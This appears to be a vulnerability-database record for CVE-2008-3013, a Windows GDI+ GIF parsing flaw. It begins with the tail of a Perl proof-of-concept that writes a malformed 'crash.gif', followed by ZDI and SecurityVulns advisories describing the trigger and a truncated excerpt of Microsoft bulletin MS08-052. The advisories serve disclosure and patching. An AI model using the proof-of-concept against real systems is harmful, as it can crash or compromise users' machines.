62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\".\r\n#3\r\n\"\\xEC\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\".\r\n#4\r\n\"\\xEC\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\".\r\n\"\\x00\". # Terminator\r\n\"\\x3B\". # Trailer\r\n\r\nopen(out, \"> crash.gif\");\r\nbinmode(out);\r\nprint (out $gif);\r\nclose(out);\r\n\r\n# milw0rm.com [2008-10-09]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6716/"}], "zdi": [{"lastseen": "2020-06-22T11:40:54", "bulletinFamily": "info", "cvelist": ["CVE-2008-3013"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows XP, Server and Vista. User interaction is required in that a user must open a malicious image file or browse to a malicious website. The specific flaws exist in the GDI+ subsystem when parsing maliciously crafted GIF files. By supplying a malformed graphic control extension an attacker can trigger an exploitable memory corruption condition. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user.", "modified": "2008-06-22T00:00:00", "published": "2008-09-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-08-056/", "id": "ZDI-08-056", "title": "Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-3013"], "description": "There is a memory corruption vulnerability with GIF file processing in\r\nMicrosoft GDI+ that can be used to crash a vulnerable application and\r\npotentially execute arbitrary code.\r\n\r\n###################\r\n#The vulnerability#\r\n###################\r\n\r\nThe vulnerability is caused due to improper handling of graphic\r\ncontrol extension when processing malformed GIF files. The\r\nvulnerability can be triggered if a large number of extension markers\r\n(0x21) followed by unknown labels is found when processing a GIF file.\r\n\r\n########\r\n#Impact#\r\n########\r\n\r\nThis vulnerability can be used to corrupt memory of any application\r\nutilizing GDI+ for GIF file decoding if it is used to open a malformed\r\nGIF file. This could lead to code execution with the privileges of the\r\nuser running the vulnerable application.\r\n\r\n############\r\n#References#\r\n############\r\n\r\nhttp://ifsec.blogspot.com/2008/09/windows-gdi-gif-memory-corruption.html\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-08-056/\r\nhttp://www.microsoft.com/technet/security/bulletin/ms08-052.mspx\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3013", "edition": 1, "modified": "2008-09-10T00:00:00", "published": "2008-09-10T00:00:00", "id": "SECURITYVULNS:DOC:20490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20490", "title": "Windows GDI+ GIF memory corruption", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "description": "Multiple vulnerabilities on different graphics format parsing.", "edition": 1, "modified": "2008-09-10T00:00:00", "published": "2008-09-10T00:00:00", "id": "SECURITYVULNS:VULN:9276", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9276", "title": "Microsoft Windows GDI library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "description": "Microsoft Security Bulletin MS08-052 \u2013 Critical\r\nVulnerabilities in GDI+ Could Allow Remote Code Execution (954593)\r\nPublished: September 9, 2008\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves several privately reported vulnerabilities in Microsoft Windows GDI+. These vulnerabilities could allow remote code execution if a user viewed a specially crafted image file using affected software or browsed a Web site that contains specially crafted content. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008, Microsoft Internet Explorer 6 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4, Microsoft Digital Image Suite 2006, SQL Server 2000 Reporting Services Service Pack 2, all supported editions of SQL Server 2005, Microsoft Report Viewer 2005 Service Pack 1 Redistributable Package, and Microsoft Report Viewer 2008 Redistributable Package.\r\n\r\nThis security update is rated Important for all supported editions of Microsoft Office XP, Microsoft Office 2003, 2007 Microsoft Office System, Microsoft Visio 2002, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, and Microsoft Forefront Client Security 1.0. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by modifying the way that GDI+ handles viewing malformed images. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update immediately.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 954593 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues.\r\n\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\n\r\nWindows Operating System and Components\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nOperating Systems\t \t \t \t \r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\nInternet Explorer 6\t \t \t \t \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nMicrosoft Internet Explorer 6 Service Pack 1\r\n(KB938464)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS07-050\r\nMicrosoft .NET Framework\t \t \t \t \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\n(KB947739)\r\n\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\n(KB947742)\r\n\r\nMicrosoft .NET Framework 2.0\r\n(KB947746)\r\n\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\n(KB947748)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\n*Windows Server 2008 Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 if Windows Server 2008 was installed using the Server Core installation option, even though the files affected by these vulnerabilities may be present on the system. However, users with the affected files will still be offered this update because the update files are newer (with higher version numbers) than the files that are currently on your system. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\n\r\nMicrosoft Office\r\nOffice Suite and Other Software\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nMicrosoft Office Suites\t \t \t \r\n\r\nMicrosoft Office XP Service Pack 3\r\n(KB953405)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS04-028\r\n\r\nMicrosoft Office 2003 Service Pack 2\r\n(KB954478)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office 2003 Service Pack 3\r\n(KB954478)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n2007 Microsoft Office System\r\n(KB954326)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n2007 Microsoft Office System Service Pack 1\r\n(KB954326)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nOther Office Software\t \t \t \r\n\r\nMicrosoft Visio 2002 Service Pack 2\r\n(KB954479)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-019\r\n\r\nMicrosoft Office PowerPoint Viewer 2003\r\n(KB956500)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-051\r\n\r\nMicrosoft Works 8\r\n(KB956483)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-044\r\n\r\nMicrosoft Digital Image Suite 2006\r\n(KB955992)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nNote Office Communicator 2005 and Office Communicator 2007 distribute a copy of gdiplus.dll that contains the affected code. However, Microsoft's analysis has shown that there are no reliable attack vectors exposed in these products.\r\n\r\nMicrosoft SQL Server\r\n\r\nDepending on your software version or edition, you may need to choose between GDR and QFE software update links below in order to manually install your update from the Microsoft Download Center. For more information on determining which update to install on your system, see the Frequently Asked Questions (FAQ) Related to This Security Update subsection, in this section.\r\nGDR Software Updates\tQFE Software Updates\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nNot applicable\r\n\t\r\n\r\nSQL Server 2000 Reporting Services Service Pack 2\r\n(KB954609)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nSQL Server 2005 Service Pack 2\r\n(KB954606)\r\n\t\r\n\r\nSQL Server 2005 Service Pack 2\r\n(KB954607)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-040\r\n\r\nSQL Server 2005 x64 Edition Service Pack 2\r\n(KB954606)\r\n\t\r\n\r\nSQL Server 2005 x64 Edition Service Pack 2\r\n(KB954607)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-040\r\n\r\nSQL Server 2005 for Itanium-based Systems Service Pack 2\r\n(KB954606)\r\n\t\r\n\r\nSQL Server 2005 for Itanium-based Systems Service Pack 2\r\n(KB954607)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-040\r\n\r\nDeveloper Tools\r\nSoftware\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Visual Studio .NET 2002 Service Pack 1\r\n(KB947736)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio .NET 2003 Service Pack 1\r\n(KB947737)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio 2005 Service Pack 1\r\n(KB947738)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual Studio 2008\r\n(KB952241)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Report Viewer 2005 Service Pack 1 Redistributable Package\r\n(KB954765)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Report Viewer 2008 Redistributable Package\r\n(KB954766)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual FoxPro 8.0 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n(KB955368)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual FoxPro 9.0 Service Pack 1 when installed on Microsoft Windows 2000 Service Pack 4\r\n(KB955369)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Visual FoxPro 9.0 Service Pack 2 when installed on Microsoft Windows 2000 Service Pack 4\r\n(KB955370)\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Platform SDK Redistributable: GDI+\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nMS04-028\r\n\r\nSecurity Software\r\nSoftware\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Forefront Client Security 1.0 when installed on Microsoft Windows 2000 Service Pack 4\r\n(KB957177)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nNon-Affected Software\r\nSoftware\tComponent\r\nOperating Systems and Components\t \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\n \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nMicrosoft Internet Explorer 5.01 Service Pack 4\r\nWindows Messenger 5.1\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nMicrosoft Internet Explorer 6\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\nWindows Messenger 5.1\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Explorer 6\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\nWindows Messenger 5.1\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Explorer 6\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\nWindows Messenger 5.1\r\n\r\nWindows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Explorer 6\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\nWindows Messenger 5.1\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nMicrosoft Internet Explorer 6\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\n\r\nWindows Server 2008 for 32-bit Systems\r\n\t\r\n\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\n\r\nWindows Server 2008 for x64-based Systems\r\n\t\r\n\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nWindows Internet Explorer 7\r\nMicrosoft .NET Framework 1.0 Service Pack 3\r\nMicrosoft .NET Framework 1.1 Service Pack 1\r\nMicrosoft .NET Framework 2.0\r\nMicrosoft .NET Framework 2.0 Service Pack 1\r\nWindows Messenger 4.7\r\nMicrosoft Office Suites\t \r\n\r\nMicrosoft Office 2000 Service Pack 3\r\n\t\r\n\r\n \r\nOther Office Software\t \r\n\r\nMicrosoft Office Viewer 2003 and Microsoft Office Viewer 2003 Service Pack 3 for Excel, PowerPoint, Word, and Visio\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office Viewer 2007 and Microsoft Office Viewer 2007 Service Pack 1 for Excel, PowerPoint, Word, and Visio\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats and Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2003 Service Pack 2\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2003 Service Pack 3\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2007\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2007 Service Pack 1\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2002 Viewer\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2003 Viewer\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2007 Viewer\r\n\t\r\n\r\n \r\n\r\nMicrosoft Visio 2007 Viewer Service Pack 1\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office PowerPoint Viewer 2007 and Microsoft Office PowerPoint Viewer 2007 Service Pack 1\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office SharePoint Server 2007\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office SharePoint Server 2007 Service Pack 1\r\n\t\r\n\r\n \r\n\r\nMicrosoft Works 9.0\r\n\t\r\n\r\n \r\n\r\nMicrosoft Works Suite 2005\r\n\t\r\n\r\n \r\n\r\nMicrosoft Works Suite 2006\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office 2004 for Mac\r\n\t\r\n\r\n \r\n\r\nMicrosoft Office 2008 for Mac\r\n\t\r\n\r\n \r\nMicrosoft SQL Server\t \r\n\r\nSQL Server 7.0 Service Pack 4\r\n\t\r\n\r\n \r\n\r\nSQL Server 2000 Service Pack 4\r\n\t\r\n\r\n \r\n\r\nSQL Server 2000 Itanium-based Edition Service Pack 4\r\n\t\r\n\r\n \r\n\r\nMicrosoft Data Engine (MSDE) 1.0\r\n\t\r\n\r\n \r\n\r\nMicrosoft SQL Server 2000 Desktop Engine (MSDE 2000)\r\n\t\r\n\r\n \r\n\r\nMicrosoft SQL Server 2005 Express Edition Service Pack 2\r\n\t\r\n\r\n \r\nDeveloper Tools\t \r\n\r\nMicrosoft Report Viewer 2005 Service Pack 1 Redistributable Package\r\n\t\r\n\r\n \r\n\r\nMicrosoft Report Viewer 2008 Redistributable Package\r\n\t\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nThe file information details can be found in Microsoft Knowledge Base Article 954593.\r\n\r\nWhat are the known issues that customers may experience when installing this security update? \r\nMicrosoft Knowledge Base Article 954593 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues.\r\n\r\nThere are both GDR and QFE updates offered for my version of SQL. How do I know which update to use? \r\nFirst, determine your SQL Server version number. For more information on determining your SQL Server version number, see Microsoft Knowledge Base Article 321185.\r\n\r\nSecond, in the table below, locate the version range that your SQL Server version number falls within. The corresponding update is the update you need to install.\r\n\r\nNote If your SQL Server version number does not fall within any of the ranges in the table below, your SQL Server version is no longer supported. Please upgrade to the latest Service Pack or SQL Server product in order to apply this and future security updates.\r\nSQL Server Version Range\r\n\r\n9.00.3042-9.00.3072\r\n\t\r\n\r\n9.00.3150-9.00.3281\r\nSQL Server\t \r\n\r\nSQL Server 2005 GDR\r\n(KB954606)\r\n\t\r\n\r\nSQL Server 2005 QFE\r\n(KB954607)\r\n\r\nFor additional installation instructions, see the Security Update Information subsection for your SQL Server edition in the Update Information section.\r\n\r\nThe last Microsoft Security Bulletinfor GDI+, MS04-028, lists affected and non-affected software that is not listed in this bulletin. Why? \r\nThe software listed in this bulletin have been tested to determine which supported versions or editions are affected and which supported versions are not affected. Other versions or editions listed in the MS04-028 are past their support life cycle. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nWhy are Microsoft .NET Framework, Microsoft Visual Studio, and Microsoft Visual FoxPro listed in the Affected Software table if they are not impacted by the vulnerabilities described by this bulletin? \r\nMicrosoft has not identified any attack vectors for these vulnerabilities specific to the affected software updated for Microsoft .NET Framework, Microsoft Visual Studio, or Microsoft Visual FoxPro. This security update is offered to developers that use Microsoft .NET Framework, Microsoft Visual Studio, or Microsoft Visual FoxPro so that they may issue their own updated version of their applications.\r\n\r\nIs Microsoft Windows 2000 Service Pack 4 affected by the vulnerabilities listed in this bulletin?\r\nNo. By default, Microsoft Windows 2000 Service Pack 4 is not affected, and will not be offered the update. However, the following software are vulnerable when installed on Microsoft Windows 2000 Service Pack 4:\r\n\u2022\t\r\n\r\nMicrosoft Internet Explorer 6\r\n\u2022\t\r\n\r\nMicrosoft Forefront Client Security 1.0\r\n\r\nThese software are only vulnerable when installed on Microsoft Windows 2000 Service Pack 4.\r\n\r\nAdditionally, the updates for developers using Microsoft .NET Framework 1.0 Service Pack 3, Microsoft .NET Framework 1.1 Service Pack 1, Microsoft .NET Framework 2.0, Microsoft .NET Framework 2.0 Service Pack 1, Microsoft Visual FoxPro 8.0 Service Pack 1, Microsoft Visual FoxPro 9.0 Service Pack 1, Microsoft Visual FoxPro 9.0 Service Pack 2, and Microsoft Platform SDK Redistributable: GDI+ only apply for application developers who develop their software on systems running Microsoft Windows 2000 Service Pack 4.\r\n\r\nWhy is Windows Server 2008 Server Core being offered this update?\r\nThe vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 if Windows Server 2008 was installed using the Server Core installation option, even though the files affected by these vulnerabilities may be present on the system. However, users with the affected files will still be offered this update because the update files are 